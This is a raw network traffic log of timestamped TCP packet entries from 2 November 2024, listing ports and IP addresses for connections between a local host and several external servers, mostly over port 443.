Nov 2, 2024 17:56:50.882457018 CET	443	49913	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.882730007 CET	49913	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.882998943 CET	443	49912	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.883090019 CET	443	49912	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.883126974 CET	443	49912	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.883172035 CET	49912	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.889031887 CET	49913	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.889031887 CET	49913	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.889053106 CET	443	49913	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.889060974 CET	443	49913	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.905642986 CET	49912	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.905679941 CET	443	49912	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.905694008 CET	49912	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.905702114 CET	443	49912	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.905781984 CET	443	49909	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.905805111 CET	443	49909	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.905890942 CET	443	49909	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.905900002 CET	49909	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.905947924 CET	49909	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.907128096 CET	49916	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.907134056 CET	443	49916	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.907165051 CET	49915	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.907186031 CET	443	49915	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.919850111 CET	49909	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.919872046 CET	443	49909	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.920037031 CET	49924	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.920083046 CET	443	49924	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.920169115 CET	49924	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.920289993 CET	49925	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.920320988 CET	443	49925	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.920372009 CET	49925	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.920840979 CET	49925	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.920864105 CET	443	49925	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.921969891 CET	49926	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.921991110 CET	443	49926	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.922041893 CET	49926	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.922332048 CET	49917	443	192.168.2.7	23.221.22.205
Nov 2, 2024 17:56:50.922414064 CET	49919	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.922416925 CET	49918	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.925158024 CET	49924	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.925175905 CET	443	49924	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.926487923 CET	49926	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:50.926510096 CET	443	49926	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:50.951576948 CET	443	49916	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.951637983 CET	49916	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.951648951 CET	443	49916	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.951700926 CET	443	49916	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.951800108 CET	49916	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.952719927 CET	49916	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.952729940 CET	443	49916	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.953103065 CET	49927	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.953124046 CET	443	49927	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.953392029 CET	49927	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.956397057 CET	49927	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.956409931 CET	443	49927	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.959197998 CET	443	49914	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.959222078 CET	443	49914	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.959275007 CET	49914	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.959285975 CET	443	49914	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.959403992 CET	443	49914	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.959453106 CET	49914	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.961419106 CET	49914	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.961427927 CET	443	49914	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.968096018 CET	443	49915	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.968153954 CET	49915	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.968182087 CET	443	49915	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.968292952 CET	443	49915	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.968334913 CET	49915	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.977834940 CET	49915	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.977860928 CET	443	49915	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.977901936 CET	49915	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.977925062 CET	49915	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.996001959 CET	443	49918	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.996031046 CET	443	49918	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.996087074 CET	49918	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:50.996099949 CET	443	49918	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.996259928 CET	443	49918	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:50.996309042 CET	49918	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:51.004638910 CET	49918	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:51.004651070 CET	443	49918	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:51.051759958 CET	49928	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:51.051786900 CET	443	49928	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:51.051852942 CET	49928	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:51.052093983 CET	49928	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:51.052102089 CET	443	49928	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:51.117383957 CET	443	49921	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:51.119000912 CET	49921	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:51.119014978 CET	443	49921	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:51.119456053 CET	49921	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:51.119461060 CET	443	49921	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:51.140197039 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.140223980 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.140239000 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.140302896 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.140322924 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.140369892 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.152966976 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.152983904 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.153069019 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.153075933 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.250411987 CET	443	49921	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:51.250442028 CET	443	49921	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:51.250478029 CET	443	49921	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:51.250499964 CET	49921	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:51.250605106 CET	49921	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:51.270049095 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.270075083 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.270114899 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.270134926 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.270168066 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.271773100 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.271806002 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.271817923 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.271825075 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.271835089 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.271846056 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.271888971 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.275507927 CET	49921	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:51.275525093 CET	443	49921	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:51.275650024 CET	49921	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:51.275660992 CET	443	49921	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:51.307465076 CET	443	49919	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:51.307487011 CET	443	49919	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:51.307568073 CET	443	49919	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:51.307589054 CET	49919	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:51.307636976 CET	49919	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:51.309277058 CET	49930	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:51.309351921 CET	443	49930	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:51.309604883 CET	49930	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:51.309947014 CET	49930	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:51.309967041 CET	443	49930	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:51.312623024 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.318006039 CET	49919	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:51.318033934 CET	443	49919	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:51.388920069 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.388930082 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.388962030 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.388989925 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.388993025 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.389005899 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.389038086 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.389060020 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.390386105 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.390400887 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.390454054 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.390459061 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.390506029 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.429528952 CET	443	49905	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:51.429555893 CET	443	49905	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:51.429563046 CET	443	49905	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:51.429585934 CET	443	49905	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:51.429599047 CET	443	49905	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:51.429634094 CET	49905	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:51.429673910 CET	443	49905	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:51.429691076 CET	49905	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:51.430258989 CET	49905	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:51.430293083 CET	443	49905	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:51.430305004 CET	49905	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:51.430454969 CET	443	49905	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:51.430490017 CET	443	49905	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:51.430526972 CET	49905	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:51.436333895 CET	49787	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:51.436709881 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:51.499845028 CET	49934	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:51.499886036 CET	443	49934	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:51.500016928 CET	49934	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:51.500317097 CET	49934	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:51.500339985 CET	443	49934	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:51.890284061 CET	443	49923	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:51.891679049 CET	443	49922	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:51.893956900 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.893994093 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.894040108 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.894037962 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.894073963 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.894083023 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.894102097 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.894112110 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.894146919 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.894731998 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.894783974 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.894810915 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.894818068 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.894845009 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.894856930 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.894871950 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.894988060 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.895298958 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.896898031 CET	80	49787	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:51.896915913 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:51.897000074 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:51.900722980 CET	49920	443	192.168.2.7	13.91.222.61
Nov 2, 2024 17:56:51.900737047 CET	443	49920	13.91.222.61	192.168.2.7
Nov 2, 2024 17:56:51.910151005 CET	49935	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.910176992 CET	443	49935	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:51.910264969 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.910288095 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:51.910300016 CET	49935	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.910353899 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.910516024 CET	49937	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.910543919 CET	443	49937	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:51.910712957 CET	49937	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.916731119 CET	49938	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.916740894 CET	443	49938	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:51.916984081 CET	49938	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.917109013 CET	49939	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.917123079 CET	443	49939	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:51.917268038 CET	49940	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.917278051 CET	443	49940	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:51.917303085 CET	49939	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.917325974 CET	49940	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.917586088 CET	49923	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:51.917598009 CET	443	49923	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:51.918297052 CET	49923	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:51.918299913 CET	443	49923	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:51.919250011 CET	49935	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.919261932 CET	443	49935	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:51.919650078 CET	49936	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.919656992 CET	443	49936	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:51.919786930 CET	49937	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.919804096 CET	443	49937	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:51.921174049 CET	49938	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.921184063 CET	443	49938	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:51.921365023 CET	49939	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.921380043 CET	443	49939	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:51.921478033 CET	49940	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:51.921487093 CET	443	49940	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:51.922533035 CET	49922	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:51.922550917 CET	443	49922	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:51.923369884 CET	49922	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:51.923376083 CET	443	49922	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:51.925064087 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:51.925142050 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:51.929913998 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:51.929974079 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:51.929984093 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:51.930002928 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:51.930012941 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:52.028789043 CET	443	49926	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.029310942 CET	49926	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.029333115 CET	443	49926	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.030006886 CET	49926	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.030011892 CET	443	49926	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.031502962 CET	443	49924	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.031568050 CET	443	49925	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.032226086 CET	49925	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:52.032260895 CET	443	49925	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.032320023 CET	49924	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.032331944 CET	443	49924	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.032699108 CET	443	49925	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.032954931 CET	49924	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.032959938 CET	443	49924	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.034641027 CET	49925	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:52.034869909 CET	443	49925	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.035116911 CET	49925	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:52.054457903 CET	443	49922	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.054598093 CET	443	49922	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.054677963 CET	49922	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.056482077 CET	49922	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.056523085 CET	443	49922	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.056555033 CET	49922	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.056562901 CET	443	49922	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.060725927 CET	49941	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.060786009 CET	443	49941	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.061414003 CET	49941	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.061666012 CET	49941	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.061697006 CET	443	49941	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.065937042 CET	443	49930	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.066853046 CET	49930	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.066891909 CET	443	49930	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.067524910 CET	49930	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.067532063 CET	443	49930	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.075351954 CET	443	49925	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.093681097 CET	443	49928	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:52.093992949 CET	49928	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:52.094011068 CET	443	49928	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:52.095096111 CET	443	49928	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:52.095160007 CET	49928	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:52.096559048 CET	49928	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:52.096626997 CET	443	49928	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:52.096746922 CET	443	49927	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.097079039 CET	49927	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:52.097112894 CET	443	49927	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.097353935 CET	49928	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:52.097362995 CET	443	49928	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:52.097481012 CET	443	49927	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.098360062 CET	49927	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:52.098440886 CET	443	49927	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.098612070 CET	49927	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:52.139354944 CET	443	49927	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.159375906 CET	443	49926	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.159482956 CET	443	49926	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.159594059 CET	49926	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.159823895 CET	49926	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.159851074 CET	443	49926	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.159863949 CET	49926	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.159869909 CET	443	49926	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.162760973 CET	49942	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.162801027 CET	443	49942	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.162888050 CET	49942	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.163032055 CET	49942	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.163044930 CET	443	49942	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.166028023 CET	443	49924	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.166105032 CET	443	49924	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.166228056 CET	49924	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.166271925 CET	49924	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.166276932 CET	443	49924	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.166299105 CET	49924	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.166302919 CET	443	49924	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.168632030 CET	49943	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.168692112 CET	443	49943	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.168766975 CET	49943	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.168905020 CET	49943	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.168925047 CET	443	49943	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.199863911 CET	443	49930	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.199928045 CET	443	49930	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.199980021 CET	49930	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.200097084 CET	49930	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.200112104 CET	443	49930	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.200139046 CET	49930	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.200145006 CET	443	49930	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.202801943 CET	49944	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.202827930 CET	443	49944	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.202891111 CET	49944	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.203178883 CET	49944	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:52.203191042 CET	443	49944	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:52.205118895 CET	49928	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:52.232686996 CET	443	49927	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.232731104 CET	443	49927	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.232786894 CET	443	49927	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.232795954 CET	49927	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:52.232827902 CET	49927	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:52.233897924 CET	49927	443	192.168.2.7	13.107.246.57
Nov 2, 2024 17:56:52.233930111 CET	443	49927	13.107.246.57	192.168.2.7
Nov 2, 2024 17:56:52.313824892 CET	443	49928	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:52.370059013 CET	443	49928	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:52.370131969 CET	49928	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:52.370358944 CET	49928	443	192.168.2.7	20.99.186.246
Nov 2, 2024 17:56:52.370372057 CET	443	49928	20.99.186.246	192.168.2.7
Nov 2, 2024 17:56:52.376945972 CET	49945	443	192.168.2.7	20.99.186.246
